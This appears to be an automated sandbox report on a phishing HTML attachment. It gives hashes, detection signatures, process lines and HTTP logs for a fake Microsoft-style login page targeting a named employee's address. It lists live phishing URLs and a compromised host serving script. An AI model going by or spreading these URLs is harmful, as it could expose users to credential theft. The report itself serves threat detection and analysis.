Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ATT00001.html

Overview

General Information

Sample name:ATT00001.html
Analysis ID:1381659
MD5:f12b5a0a02830389b1d59e8e3211167e
SHA1:d50adac41f12826155a327162bc160445230ce55
SHA256:c15fefaa7e89c81c1ac6dfe0f5c6ed1743ace6c49955dad565dc782aa68501be
Infos:

Detection

HTMLPhisher
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

HTML file submission requesting Cloudflare captcha challenge
Yara detected HtmlPhish62
Detected javascript redirector / loader
HTML Script injector detected
Phishing site detected (based on OCR NLP Model)
Phishing site detected (based on image similarity)
Suspicious Javascript code found in HTML file
Creates files inside the system directory
HTML body contains low number of good links
HTML page contains hidden URLs or javascript code
HTML title does not match URL
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Stores files to the Windows start menu directory
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 7112 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\ATT00001.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6752 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=2040,i,1513467722100339984,2560911328542590446,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
1.1.pages.csvJoeSecurity_HtmlPhish_62Yara detected HtmlPhish_62Joe Security
    5.6.pages.csvJoeSecurity_HtmlPhish_62Yara detected HtmlPhish_62Joe Security
      8.9.pages.csvJoeSecurity_HtmlPhish_62Yara detected HtmlPhish_62Joe Security
        8.11.pages.csvJoeSecurity_HtmlPhish_62Yara detected HtmlPhish_62Joe Security
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          Phishing

          barindex
          Source: Yara matchFile source: 1.1.pages.csv, type: HTML
          Source: Yara matchFile source: 5.6.pages.csv, type: HTML
          Source: Yara matchFile source: 8.9.pages.csv, type: HTML
          Source: Yara matchFile source: 8.11.pages.csv, type: HTML
          Source: ATT00001.htmlHTTP Parser: Low number of body elements: 0
          Source: file:///C:/Users/user/Desktop/ATT00001.htmlHTTP Parser: New script tag found
          Source: Chrome DOMML Model on OCR Text: Matched 63.3% probability on "AFTRA' Servi ces david.yvon@aftral.com Enter password Because you're accessing sensitive info, you need to verify your password. Password Forgot my password Sign in Bienvenue sur le Portail du groupe AFTRAL Privacy & Terms of use "
          Source: file:///C:/Users/user/Desktop/ATT00001.htmlMatcher: Found strong image similarity, brand: MICROSOFT
          Source: ATT00001.htmlHTTP Parser: document.write
          Source: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/?0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29tHTTP Parser: Number of links: 0
          Source: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?erHTTP Parser: Number of links: 1
          Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/v8qzf/0x4AAAAAAAQlQKVshTj02gAC/auto/normalHTTP Parser: Base64 decoded: http://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/v8qzf/0x4AAAAAAAQlQKVshTj02gAC/auto/normal
          Source: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/?0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29tHTTP Parser: Title: OqBFCnANNHlPI does not match URL
          Source: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?erHTTP Parser: Title: ssuEzxT4O does not match URL
          Source: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/?0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29tHTTP Parser: <input type="password" .../> found
          Source: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?erHTTP Parser: <input type="password" .../> found
          Source: file:///C:/Users/user/Desktop/ATT00001.htmlHTTP Parser: No favicon
          Source: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/hIdlMLOfWxySOTr9FfmxCijqf/#4ZGF2aWQueXZvbkBhZnRyYWwuY29tHTTP Parser: No favicon
          Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/v8qzf/0x4AAAAAAAQlQKVshTj02gAC/auto/normalHTTP Parser: No favicon
          Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/v8qzf/0x4AAAAAAAQlQKVshTj02gAC/auto/normalHTTP Parser: No favicon
          Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3DHTTP Parser: No favicon
          Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=84b92c841f99b127HTTP Parser: No favicon
          Source: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/?0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29tHTTP Parser: No favicon
          Source: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/6X8VIE8xj/7PshMcgyswItAHTTP Parser: No favicon
          Source: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/6EWqQ2tPJ3hOCQyr/8EIQOSnBtHTTP Parser: No favicon
          Source: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?erHTTP Parser: No favicon
          Source: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?erHTTP Parser: No favicon
          Source: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/0AAZf0BPQd1iVI?erHTTP Parser: No favicon
          Source: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/?0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29tHTTP Parser: No <meta name="author".. found
          Source: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?erHTTP Parser: No <meta name="author".. found
          Source: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?erHTTP Parser: No <meta name="author".. found
          Source: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/?0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29tHTTP Parser: No <meta name="copyright".. found
          Source: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?erHTTP Parser: No <meta name="copyright".. found
          Source: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?erHTTP Parser: No <meta name="copyright".. found
          Source: unknownHTTPS traffic detected: 23.1.237.25:443 -> 192.168.2.16:49754 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.16:49751 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.16:49814 version: TLS 1.2
          Source: Joe Sandbox ViewIP Address: 152.195.19.97 152.195.19.97
          Source: Joe Sandbox ViewIP Address: 151.101.65.229 151.101.65.229
          Source: Joe Sandbox ViewIP Address: 104.17.3.184 104.17.3.184
          Source: Joe Sandbox ViewIP Address: 172.67.139.144 172.67.139.144
          Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
          Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
          Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
          Source: unknownHTTPS traffic detected: 23.1.237.25:443 -> 192.168.2.16:49754 version: TLS 1.0
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
          Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
          Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
          Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
          Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
          Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
          Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
          Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
          Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
          Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
          Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
          Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
          Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
          Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
          Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
          Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
          Source: unknownTCP traffic detected without corresponding DNS query: 72.21.81.240
          Source: unknownTCP traffic detected without corresponding DNS query: 72.21.81.240
          Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
          Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
          Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
          Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
          Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
          Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
          Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
          Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
          Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
          Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
          Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
          Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
          Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
          Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
          Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-117.0.5938.132Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-header.php?2-53307050547934765338334f4d3036737944524f5336737954637a554b796f72546334767a637771317973714251413d-mknfazxqqVo HTTP/1.1Host: kibt.edu.lkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /logos/0028/7193/logox_0.png?ZBulnusKdtgyimF HTTP/1.1Host: cascade-madmimi-com.translate.googConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /logos/0028/7193/logox_0.png?ZBulnusKdtgyimF HTTP/1.1Host: cascade-madmimi-com.translate.googConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /hIdlMLOfWxySOTr9FfmxCijqf/ HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /npm/bootstrap@5.0.2/dist/css/bootstrap.min.css HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/ea25f566/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /npm/bootstrap@5.0.2/dist/css/bootstrap.min.css.map HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/v8qzf/0x4AAAAAAAQlQKVshTj02gAC/auto/normal HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=84b92c841f99b127 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/v8qzf/0x4AAAAAAAQlQKVshTj02gAC/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/v8qzf/0x4AAAAAAAQlQKVshTj02gAC/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/hIdlMLOfWxySOTr9FfmxCijqf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/665851253:1706274618:ee7eBQ0fH6Ey9MEbinbSg9TNLutSYhmnKDUTs70R0JE/84b92c841f99b127/bd4b5c1cf495e39 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/84b92c841f99b127/1706276492524/rUSBpge9MP4B7lT HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/v8qzf/0x4AAAAAAAQlQKVshTj02gAC/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/84b92c841f99b127/1706276492524/rUSBpge9MP4B7lT HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/84b92c841f99b127/1706276492529/0f9d73079a8b7d0394f678ae367e0851b92badef3e469819b69f138814626d66/Dm3EdLb9rOJ2F90 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/v8qzf/0x4AAAAAAAQlQKVshTj02gAC/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/665851253:1706274618:ee7eBQ0fH6Ey9MEbinbSg9TNLutSYhmnKDUTs70R0JE/84b92c841f99b127/bd4b5c1cf495e39 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=wN7XR4hVYYybUva&MD=vM4W2nhp HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3DAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
